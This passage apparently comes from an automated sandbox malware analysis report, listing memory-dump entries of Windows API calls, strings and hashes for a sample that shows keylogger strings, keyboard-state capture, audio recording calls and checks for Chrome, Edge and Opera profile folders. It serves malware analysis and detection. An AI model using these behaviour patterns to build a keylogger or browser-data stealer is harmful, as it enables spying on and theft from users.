                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                APIs
                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                • IsWindowVisible.USER32(?), ref: 00415B37
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$TextVisible
                                • String ID: (%G
                                • API String ID: 1670992164-3377777310
                                • Opcode ID: 9e4763bd1cf6ba5bf80e6359ca4df74b646347378df584ac5dd90118999f6643
                                • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                • Opcode Fuzzy Hash: 9e4763bd1cf6ba5bf80e6359ca4df74b646347378df584ac5dd90118999f6643
                                • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                APIs
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0043A47A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallFilterFunc@8
                                • String ID: @F$@F
                                • API String ID: 4062629308-3436687868
                                • Opcode ID: 01be4156570bba91bd41b6ba4955b04eb027de8bcb16e70c41f215e4a53bdf77
                                • Instruction ID: d046661977b9f70fa2c81c6cfd40d9a104c7fef52231e330e595ae3c7a73c1ff
                                • Opcode Fuzzy Hash: 01be4156570bba91bd41b6ba4955b04eb027de8bcb16e70c41f215e4a53bdf77
                                • Instruction Fuzzy Hash: 2F214C3165020056D7186B799D0636F33915F5D338F28A31FF8A18B3E1E7BC8962860F
                                APIs
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0043A8BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallFilterFunc@8
                                • String ID: @F$@F
                                • API String ID: 4062629308-3436687868
                                • Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                • Instruction ID: 70967ea4cb1e6682f5d06301c8bd88165fdf16009f8cb562ef1cc0c82826ef49
                                • Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                • Instruction Fuzzy Hash: 4C212531A5021086C71CBB799C0236E7391AF4D338F28675FF8A29A2D1E77C8953864F
                                APIs
                                • _free.LIBCMT ref: 0044BE70
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFreeHeapLast_free
                                • String ID: pF$KS
                                • API String ID: 1353095263-4051209147
                                • Opcode ID: 9c9b1892929c326675bb102bdb2c5e852900ab225de85b6b9f7e2b64198450d9
                                • Instruction ID: 55a4a27b62ea69fcd5177a700e9921c5dc883134b6193b34980b9784b8bdd257
                                • Opcode Fuzzy Hash: 9c9b1892929c326675bb102bdb2c5e852900ab225de85b6b9f7e2b64198450d9
                                • Instruction Fuzzy Hash: 2C21BE78200200DFE310DF1DE881E9177E4EF5D31872505AAF689CB3B2E666EC40CB99
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 0044753C
                                • GetFileType.KERNEL32(00000000), ref: 0044754E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileHandleType
                                • String ID: 0]T
                                • API String ID: 3000768030-3090778742
                                • Opcode ID: 584d983f07588d59a80cd593781a2b5952fd179e8a6c53e317df8b7e088317fe
                                • Instruction ID: f3e64406935b1962c0d1e5831b9f441d98c156aa3d193b91852e36c68e8d9cf3
                                • Opcode Fuzzy Hash: 584d983f07588d59a80cd593781a2b5952fd179e8a6c53e317df8b7e088317fe
                                • Instruction Fuzzy Hash: 5C113A7150C7416AE7304E3D9C882237B94A756331B78072BD0B6CBAF2C738E983964E
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                • ___raise_securityfailure.LIBCMT ref: 00432E76
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: (F
                                • API String ID: 3761405300-3109638091
                                • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: e17ac6180e740d8127f14c5964bc4a28a6771087d9435cdaa38a9718e52cab03
                                • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                • Opcode Fuzzy Hash: e17ac6180e740d8127f14c5964bc4a28a6771087d9435cdaa38a9718e52cab03
                                • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                APIs
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041209B
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004120D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: QueryValue
                                • String ID: P0F
                                • API String ID: 3660427363-3540264436
                                • Opcode ID: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
                                • Instruction ID: 333f44122c6306c69f78a99928583bd7e211529a197e6eb40258ce4aa2bc4044
                                • Opcode Fuzzy Hash: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
                                • Instruction Fuzzy Hash: 5101DFB6A0010CBFEB14DB91DC06EFE7BBDEB48210F00017AFA04E2200E6B16F0096B4
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CloseHandle.KERNEL32(?), ref: 00409FFD
                                • UnhookWindowsHookEx.USER32 ref: 0040A010
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: dd94839f5298d425d34c33682383094e81a47364d328da6cff6cdccbfe171a6b
                                • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                • Opcode Fuzzy Hash: dd94839f5298d425d34c33682383094e81a47364d328da6cff6cdccbfe171a6b
                                • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                APIs
                                  • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046B780,00000010,0043A9DB), ref: 0044852C
                                • _free.LIBCMT ref: 0044853A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$DeleteEnter_free
                                • String ID: 0]T
                                • API String ID: 1836352639-3090778742
                                • Opcode ID: bf9b03ae5560feba4a6dffad266a5f0b3d53bc63c97ec9c6169899155bc6cddf
                                • Instruction ID: e4a66ad6b61ce482acc1b9e2cae33de82c0ba6a550a62ff3290d8f8c14ed10e3
                                • Opcode Fuzzy Hash: bf9b03ae5560feba4a6dffad266a5f0b3d53bc63c97ec9c6169899155bc6cddf
                                • Instruction Fuzzy Hash: C3111231540214AFE710EF99E846B5D73B0BF04715F50412AF891DB3A2DBB8D8458B0D
                                APIs
                                • waveInPrepareHeader.WINMM(0053DB38,00000020,?,?,00473A38,00471E78,?,00000000,004019F5), ref: 00401829
                                • waveInAddBuffer.WINMM(0053DB38,00000020,?,00000000,004019F5), ref: 0040183F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: 0zS
                                • API String ID: 2315374483-4237864368
                                • Opcode ID: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
                                • Instruction ID: 3a660176e7f8b230147204ba984e124cfbcdafa7022ac6de76214ba255081ced
                                • Opcode Fuzzy Hash: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
                                • Instruction Fuzzy Hash: 2F01AD76300205AFD7009F79EC44A29BBB9FB49314701813AF809C3772EB75AC118B98
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: b6b90106b0942584e4bab718b7201a0be85cbabe2790b160a6e2defc3a1b3ad2
                                • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                • Opcode Fuzzy Hash: b6b90106b0942584e4bab718b7201a0be85cbabe2790b160a6e2defc3a1b3ad2
                                • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: ecb3c799a6769b9d5cb1a880d2bf6d263819ada574146216786c7dbbdc45bca2
                                • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                • Opcode Fuzzy Hash: ecb3c799a6769b9d5cb1a880d2bf6d263819ada574146216786c7dbbdc45bca2
                                • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: 844f1f43d5b359846dd9af1160d69e5aca714beb6ccccfa52de30f1871aca640
                                • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                • Opcode Fuzzy Hash: 844f1f43d5b359846dd9af1160d69e5aca714beb6ccccfa52de30f1871aca640
                                • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: @!S
                                • API String ID: 269201875-4045816191
                                • Opcode ID: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
                                • Instruction ID: 2da6b69c26c345968169ae82ae00459ec8aec7f537a5c8756946128e80711ba3
                                • Opcode Fuzzy Hash: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
                                • Instruction Fuzzy Hash: 5EE02B62A0553460F621273F3C49B6B15849BC137AF21033FF664861D1FF7C485A615E
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040A597
                                  • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                                  • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                  • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                  • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                  • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                  • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(00000000,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                • String ID: [AltL]$[AltR]
                                • API String ID: 3195419117-2658077756
                                • Opcode ID: aeeb78a5c443d10d52a26804ffa779b2a0c75437e402bbe4ee74375077af7b99
                                • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                • Opcode Fuzzy Hash: aeeb78a5c443d10d52a26804ffa779b2a0c75437e402bbe4ee74375077af7b99
                                • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040A5F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: beca56f48678838db2b0c84e402293e6c07756c41a634cf4ef6ffcea62ac2b9c
                                • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                • Opcode Fuzzy Hash: beca56f48678838db2b0c84e402293e6c07756c41a634cf4ef6ffcea62ac2b9c
                                • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: 6h@
                                • API String ID: 2654517830-73392143
                                • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
